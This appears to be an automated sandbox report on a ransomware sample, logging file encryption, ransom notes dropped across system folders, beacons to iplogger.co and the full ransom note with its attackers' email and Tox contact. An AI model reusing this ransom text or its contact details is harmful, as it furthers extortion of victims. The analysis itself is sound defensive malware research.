Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\limited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\policy\unlimited\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\DataType\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\Part\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\Data Sources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\MSMAPI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\ole db\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EURO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\GRPHFLT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Help\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\MSClientDataMgr\README.TXTJump to behavior
Source: unknownHTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49964 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49966 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: win_gui.exe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7-zip32.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTMJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\Welcome.htmlJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: Z:\Recovery\WindowsRE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C812D InterlockedIncrement,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,FindNextFileW,FindClose,InterlockedDecrement,Sleep,Sleep,0_2_005C812D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9F53 FindFirstFileW,FindClose,0_2_005C9F53
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00675337 FindFirstFileExA,0_2_00675337
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C9585 GetEnvironmentVariableW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,CreateDirectoryW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,GetModuleFileNameW,CopyFileW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CreateProcessW,ExitProcess,0_2_005C9585
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA715 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,lstrlenW,lstrlenW,0_2_005CA715
Source: Joe Sandbox ViewIP Address: 172.67.167.249 172.67.167.249
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: iplogger.co
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CAF2D Sleep,lstrlenA,InternetOpenW,MultiByteToWideChar,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_005CAF2D
Source: global traffic | HTTP traffic detected: GET /155qJ4.torrent HTTP/1.1 | Referer: BEGIN | User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322 | Host: iplogger.co | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT | Range: bytes=0-2147483646 | User-Agent: Microsoft BITS/7.8 | Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected: GET /155qJ4.torrent HTTP/1.1 | Referer: END | User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322 | Host: iplogger.co | Cache-Control: no-cache | Cookie: 55593078137264100=3; clhf03028ja=8.46.123.228
Source: global traffic | DNS traffic detected: DNS query: iplogger.co
Source: jfr.jar.0.dr | String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: win_gui.exe.exe, 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp, README.TXT48.0.dr, README.TXT271.0.dr, README.TXT262.0.dr, README.TXT404.0.dr, README.TXT582.0.dr, README.TXT629.0.dr, README.TXT541.0.dr, README.TXT574.0.dr, README.TXT555.0.dr, README.TXT374.0.dr, README.TXT586.0.dr, README.TXT243.0.dr, README.TXT382.0.dr, README.TXT200.0.dr, README.TXT669.0.dr, README.TXT391.0.dr, README.TXT418.0.dr, README.TXT350.0.dr, README.TXT127.0.dr, README.TXT333.0.dr | String found in binary or memory: http://utox.org
Source: jfr.jar.0.dr | String found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: jfr.jar.0.dr | String found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: jfr.jar.0.dr | String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001651000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4482295362.0000000005530000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/
Source: win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrent
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrent5
Source: win_gui.exe.exe, 00000000.00000003.2450063743.000000000163A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.000000000162D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.000000000163D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrent9
Source: win_gui.exe.exe, 00000000.00000002.4487317189.00000000082CB000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrent;
Source: win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrentG
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481037911.00000000012FB000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrente
Source: win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/155qJ4.torrentgb
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/ces
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/fests
Source: win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.co/ram
Source: win_gui.exe.exe | String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: win_gui.exe.exe, 00000000.00000003.2674720642.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\C:\Program Files (x86)\autoit3\Examples\Helpfile\_WinAPI_RegisterRawInputDevices[2].au3_${memstr_b62a08a2-b
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005CC728 SendMessageW,SendMessageW,SendMessageW,DefWindowProcW,SendMessageW,SendMessageW,SendMessageW,DestroyWindow,CreateThread,SHEmptyRecycleBinW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DestroyWindow,MoveWindow,MoveWindow,MoveWindow,MoveWindow,MoveWindow,SendMessageW,SendMessageW,SendMessageW,UnregisterHotKey,UnregisterHotKey,UnregisterHotKey,UnregisterHotKey,KillTimer,DeleteObject,UnregisterClassW,DeleteCriticalSection,PostQuitMessage,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,EnterCriticalSection,LeaveCriticalSection,__aulldiv,__aulldvrm,SendMessageW,SendMessageW,SendMessageW,SendMessageW,lstrcmpiW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,SendMessageW,ShowWindow,PostMessageW,DragQueryFileW,DragQueryFileW,DragQueryFileW,0_2_005CC728

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\win_gui.exe.exe File moved: C:\Users\user\Desktop\DUUDTUBZFW.xlsx
Source: C:\Users\user\Desktop\win_gui.exe.exe File moved: C:\Users\user\Desktop\GRXZDKKVDB.pdf
Source: C:\Users\user\Desktop\win_gui.exe.exe File moved: C:\Users\user\Desktop\KLIZUSIQEN.mp3
Source: C:\Users\user\Desktop\win_gui.exe.exe File moved: C:\Users\user\Desktop\EIVQSAOTAQ.pdf
Source: C:\Users\user\Desktop\win_gui.exe.exe File moved: C:\Users\user\Desktop\HMPPSXQPQV.mp3
Source: C:\Users\user\Desktop\win_gui.exe.exe File dropped: README.TXT, written with identical content to each of the following paths:
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ar-ae\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\README.TXT
C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\README.TXT
C:\README.TXT
Dropped file content, as captured in the report: decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat entropy: 7.99369054916Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat entropy: 7.99936782695Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat entropy: 7.99399556194Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9977160786Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99837321083Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7zCon.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99903813816Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99834054125Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7z.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9991614987Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\History.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9968065076Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99803192935Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Info.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99880834129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\maintenanceservice.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99929791332Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Info_x64.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99910665943Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Check.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99914277617Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99739704231Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoIt3Help.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99858582028Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoIt.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99570884073Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99037768821Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99045771948Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99159934858Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99078840226Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\StructureConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99737452337Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\Visa.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99517680179Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIConv.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99448116193Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIDiag.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99481562808Jump to dropped file
